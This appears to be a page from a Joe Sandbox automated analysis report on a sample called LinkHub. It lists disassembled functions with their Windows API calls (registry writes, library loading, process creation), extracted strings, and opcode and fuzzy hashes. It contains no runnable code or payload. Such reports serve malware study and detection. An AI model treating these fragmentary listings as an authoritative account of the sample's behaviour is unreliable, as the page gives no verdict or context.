                                                                      • Part of subcall function 00CD1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00CD14FD,?), ref: 00CD1B03
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                    • String ID:
                                                                    • API String ID: 4175595110-0
                                                                    • Opcode ID: 8f6709f3fa959c0086846fca0609e302d37cbe86866ce29a75f312af5e37ec61
                                                                    • Instruction ID: 0ba47938cbf48adaf8d7721d5a00940ff5ef137d89c7f97c8e53be6f86baf1a7
                                                                    • Opcode Fuzzy Hash: 8f6709f3fa959c0086846fca0609e302d37cbe86866ce29a75f312af5e37ec61
                                                                    • Instruction Fuzzy Hash: DE713CB2D00309BBDB10DFE5DC85FAEBBB9BF44310F194126EA19E6290D7319A05DB60
                                                                    Function 00CFCE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CFCF1D
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00D0DCD0,00000000,?,00000000,?,?), ref: 00CFCFA4
                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00CFD004
                                                                    • _wcslen.LIBCMT ref: 00CFD054
                                                                    • _wcslen.LIBCMT ref: 00CFD0CF
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00CFD112
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00CFD221
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00CFD2AD
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00CFD2E1
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00CFD2EE
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00CFD3C0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 9721498-966354055
                                                                    • Opcode ID: 5ed89b8f5552634b4508ad1ebb6dd3f0953a4fe3a47eb53720a6ddc9e3975bba
                                                                    • Instruction ID: 26e7d1a44bc10e2c9aa76f1a1a003f426cc0715d2f7b3796bca23ee75b84f367
                                                                    • Opcode Fuzzy Hash: 5ed89b8f5552634b4508ad1ebb6dd3f0953a4fe3a47eb53720a6ddc9e3975bba
                                                                    • Instruction Fuzzy Hash: 45126A356042059FCB14DF24C885B2AB7E6FF88714F04889DF95A9B3A2CB31ED45DB92
                                                                    Function 00D013BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00D01462
                                                                    • _wcslen.LIBCMT ref: 00D0149D
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D014F0
                                                                    • _wcslen.LIBCMT ref: 00D01526
                                                                    • _wcslen.LIBCMT ref: 00D015A2
                                                                    • _wcslen.LIBCMT ref: 00D0161D
                                                                      • Part of subcall function 00C8FD52: _wcslen.LIBCMT ref: 00C8FD5D
                                                                      • Part of subcall function 00CD3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CD3547
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                    • API String ID: 1103490817-4258414348
                                                                    • Opcode ID: e3268151cf51ae9db795df5e9b6a3e0b4adeadc160e9eba29e58f404d6ea9159
                                                                    • Instruction ID: 03653786956b0e349d56351fd84e31499f681ff57f8716935d263416f7601afb
                                                                    • Opcode Fuzzy Hash: e3268151cf51ae9db795df5e9b6a3e0b4adeadc160e9eba29e58f404d6ea9159
                                                                    • Instruction Fuzzy Hash: C6E1A0396043019FC714EF24C450A2AB7E2FF98314F58895DF89A9B3A2DB31ED45DBA1
                                                                    Function 00CFD3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharUpper
                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                    • API String ID: 1256254125-909552448
                                                                    • Opcode ID: 8f4165dad8454d0a37df017ba187770ad7f9390372f495c7979dc92f04d65ad0
                                                                    • Instruction ID: 2546247657aace38cef847912a4e1c8453077ec710da3dc65332f686d722a7ac
                                                                    • Opcode Fuzzy Hash: 8f4165dad8454d0a37df017ba187770ad7f9390372f495c7979dc92f04d65ad0
                                                                    • Instruction Fuzzy Hash: 0B71F9B260022E8BCB509F7CC9405BE37A3AF60754F210528FA67D7294EA35DE4593A2
                                                                    Function 00D08D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00D08DB5
                                                                    • _wcslen.LIBCMT ref: 00D08DC9
                                                                    • _wcslen.LIBCMT ref: 00D08DEC
                                                                    • _wcslen.LIBCMT ref: 00D08E0F
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00D08E4D
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00D06691), ref: 00D08EA9
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D08EE2
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00D08F25
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D08F5C
                                                                    • FreeLibrary.KERNEL32(?), ref: 00D08F68
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D08F78
                                                                    • DestroyIcon.USER32(?,?,?,?,?,00D06691), ref: 00D08F87
                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00D08FA4
                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00D08FB0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                    • String ID: .dll$.exe$.icl
                                                                    • API String ID: 799131459-1154884017
                                                                    • Opcode ID: f230701c37335ce1ef50862e8d3329d3280c753d02e669bbbc148f161504d686
                                                                    • Instruction ID: 6095328f84d016c8fc37150880adba3f63ae5c357a6799c5d9efb6ac8eb0e8a4
                                                                    • Opcode Fuzzy Hash: f230701c37335ce1ef50862e8d3329d3280c753d02e669bbbc148f161504d686
                                                                    • Instruction Fuzzy Hash: CD61DF71900215BEEB14DF74CC45FBEBBA9AF08B10F108106F959E61D1DBB5AA50EBB0
                                                                    Function 00CE48BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?), ref: 00CE493D
                                                                    • _wcslen.LIBCMT ref: 00CE4948
                                                                    • _wcslen.LIBCMT ref: 00CE499F
                                                                    • _wcslen.LIBCMT ref: 00CE49DD
                                                                    • GetDriveTypeW.KERNEL32(?), ref: 00CE4A1B
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CE4A63
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CE4A9E
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CE4ACC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                    • API String ID: 1839972693-4113822522
                                                                    • Opcode ID: 790757092e9850705e4ed0061af6ec85bac7c43cde7f1fa3993ab43aa1656bcc
                                                                    • Instruction ID: 0203397cba9f4893db5f494b104783db6361ef045b22619f61c476055b3e888d
                                                                    • Opcode Fuzzy Hash: 790757092e9850705e4ed0061af6ec85bac7c43cde7f1fa3993ab43aa1656bcc
                                                                    • Instruction Fuzzy Hash: 0071E2725086118FC714EF35C84096BB7E8FF98768F00892DF8A597262EB30DE45DB91
                                                                    Function 00CD6382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadIconW.USER32(00000063), ref: 00CD6395
                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CD63A7
                                                                    • SetWindowTextW.USER32(?,?), ref: 00CD63BE
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00CD63D3
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00CD63D9
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00CD63E9
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00CD63EF
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00CD6410
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00CD642A
                                                                    • GetWindowRect.USER32(?,?), ref: 00CD6433
                                                                    • _wcslen.LIBCMT ref: 00CD649A
                                                                    • SetWindowTextW.USER32(?,?), ref: 00CD64D6
                                                                    • GetDesktopWindow.USER32 ref: 00CD64DC
                                                                    • GetWindowRect.USER32(00000000), ref: 00CD64E3
                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00CD653A
                                                                    • GetClientRect.USER32(?,?), ref: 00CD6547
                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00CD656C
                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00CD6596
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                    • String ID:
                                                                    • API String ID: 895679908-0
                                                                    • Opcode ID: 1992f9dc7ddf9f158470ff831417f84973297a670d796d3df14d4d1ce5b8293d
                                                                    • Instruction ID: 3df2cc78ba95566534f43573ddc2663947676e0ff64bcf99069a5bf20b04800b
                                                                    • Opcode Fuzzy Hash: 1992f9dc7ddf9f158470ff831417f84973297a670d796d3df14d4d1ce5b8293d
                                                                    • Instruction Fuzzy Hash: 147170319007099FDB20DFA9CE45BAEBBF5FF48704F10051AE696E26A0D775EA44CB60
                                                                    Function 00CF086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00CF0884
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00CF088F
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00CF089A
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00CF08A5
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00CF08B0
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00CF08BB
                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00CF08C6
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00CF08D1
                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00CF08DC
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00CF08E7
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00CF08F2
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00CF08FD
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00CF0908
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00CF0913
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00CF091E
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00CF0929
                                                                    • GetCursorInfo.USER32(?), ref: 00CF0939
                                                                    • GetLastError.KERNEL32 ref: 00CF097B
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                    • String ID:
                                                                    • API String ID: 3215588206-0
                                                                    • Opcode ID: cf2d65c2ca9ce4029c2e232e3312e90d4ba191dc15fcf3df65ecf42349b4641f
                                                                    • Instruction ID: 2a213d141b7f6ecea929f04a45c12c2af0bb4e13e96459e1ed9fd0ae1dd54bf9
                                                                    • Opcode Fuzzy Hash: cf2d65c2ca9ce4029c2e232e3312e90d4ba191dc15fcf3df65ecf42349b4641f
                                                                    • Instruction Fuzzy Hash: 144163B0D483196BDB50DFBA8C8986EBFE8FF04754B50452AE11CE7292DA78D901CF91
                                                                    Function 00C90436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00C90436
                                                                      • Part of subcall function 00C9045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00D4170C,00000FA0,086FFC6B,?,?,?,?,00CB2733,000000FF), ref: 00C9048C
                                                                      • Part of subcall function 00C9045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00CB2733,000000FF), ref: 00C90497
                                                                      • Part of subcall function 00C9045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00CB2733,000000FF), ref: 00C904A8
                                                                      • Part of subcall function 00C9045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00C904BE
                                                                      • Part of subcall function 00C9045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C904CC
                                                                      • Part of subcall function 00C9045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C904DA
                                                                      • Part of subcall function 00C9045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C90505
                                                                      • Part of subcall function 00C9045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C90510
                                                                    • ___scrt_fastfail.LIBCMT ref: 00C90457
                                                                      • Part of subcall function 00C90413: __onexit.LIBCMT ref: 00C90419
                                                                    Strings
                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C90492
                                                                    • kernel32.dll, xrefs: 00C904A3
                                                                    • WakeAllConditionVariable, xrefs: 00C904D2
                                                                    • SleepConditionVariableCS, xrefs: 00C904C4
                                                                    • InitializeConditionVariable, xrefs: 00C904B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                    • API String ID: 66158676-1714406822
                                                                    • Opcode ID: 214be80e63291cd7050571d17d424972dba9175922dea4fe887daa58b1454a18
                                                                    • Instruction ID: aa42ccbd443adca5df9e8d496df113e9fd0739f235c297fad5676af8b38b8587
                                                                    • Opcode Fuzzy Hash: 214be80e63291cd7050571d17d424972dba9175922dea4fe887daa58b1454a18
                                                                    • Instruction Fuzzy Hash: EF210836A40704BFDB106BE4BC0EBA93B99EF05B61F210126F905D3780DFB09D808A75
                                                                    Function 00CD3A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                    • API String ID: 176396367-1603158881
                                                                    • Opcode ID: a0694effe6b37225c1e43af93872b91d721502175e5ab6d9b60eda27322ca007
                                                                    • Instruction ID: 0fbe7635ca2ea43224e6f3c0c9211af154ee085dc0bce117831a064a836bc9ec
                                                                    • Opcode Fuzzy Hash: a0694effe6b37225c1e43af93872b91d721502175e5ab6d9b60eda27322ca007
                                                                    • Instruction Fuzzy Hash: 5AE1E532A00556AFCB189FB4C8416EDFBB1BF54710F14811BE666E7390DB309F459BA1
                                                                    Function 00CE4F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(00000000,00000000,00D0DCD0), ref: 00CE4F6C
                                                                    • _wcslen.LIBCMT ref: 00CE4F80
                                                                    • _wcslen.LIBCMT ref: 00CE4FDE
                                                                    • _wcslen.LIBCMT ref: 00CE5039
                                                                    • _wcslen.LIBCMT ref: 00CE5084
                                                                    • _wcslen.LIBCMT ref: 00CE50EC
                                                                      • Part of subcall function 00C8FD52: _wcslen.LIBCMT ref: 00C8FD5D
                                                                    • GetDriveTypeW.KERNEL32(?,00D37C10,00000061), ref: 00CE5188
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                    • API String ID: 2055661098-1000479233
                                                                    • Opcode ID: afefae368fec3cfea723766ddad878d8bfe70a3de727806cb0ef6036a97ff0bd
                                                                    • Instruction ID: 9c3dbad1f483fb594bbc613eaa214b74ed08aba7c0218f6c9edfc364414313af
                                                                    • Opcode Fuzzy Hash: afefae368fec3cfea723766ddad878d8bfe70a3de727806cb0ef6036a97ff0bd
                                                                    • Instruction Fuzzy Hash: A5B126316087429FC714DF2AC890A6EB7E5BFA4728F10891DF5AAC7291D730DD45CBA2
                                                                    Function 00CFBA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00CFBBF8
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CFBC10
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CFBC34
                                                                    • _wcslen.LIBCMT ref: 00CFBC60
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CFBC74
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CFBC96
                                                                    • _wcslen.LIBCMT ref: 00CFBD92
                                                                      • Part of subcall function 00CE0F4E: GetStdHandle.KERNEL32(000000F6), ref: 00CE0F6D
                                                                    • _wcslen.LIBCMT ref: 00CFBDAB
                                                                    • _wcslen.LIBCMT ref: 00CFBDC6
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CFBE16
                                                                    • GetLastError.KERNEL32(00000000), ref: 00CFBE67
                                                                    • CloseHandle.KERNEL32(?), ref: 00CFBE99
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CFBEAA
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CFBEBC
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CFBECE
                                                                    • CloseHandle.KERNEL32(?), ref: 00CFBF43
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 2178637699-0
                                                                    • Opcode ID: 4754d1b9321ec70c994a064d50058da10c7557ee40277759df591ef8a734a793
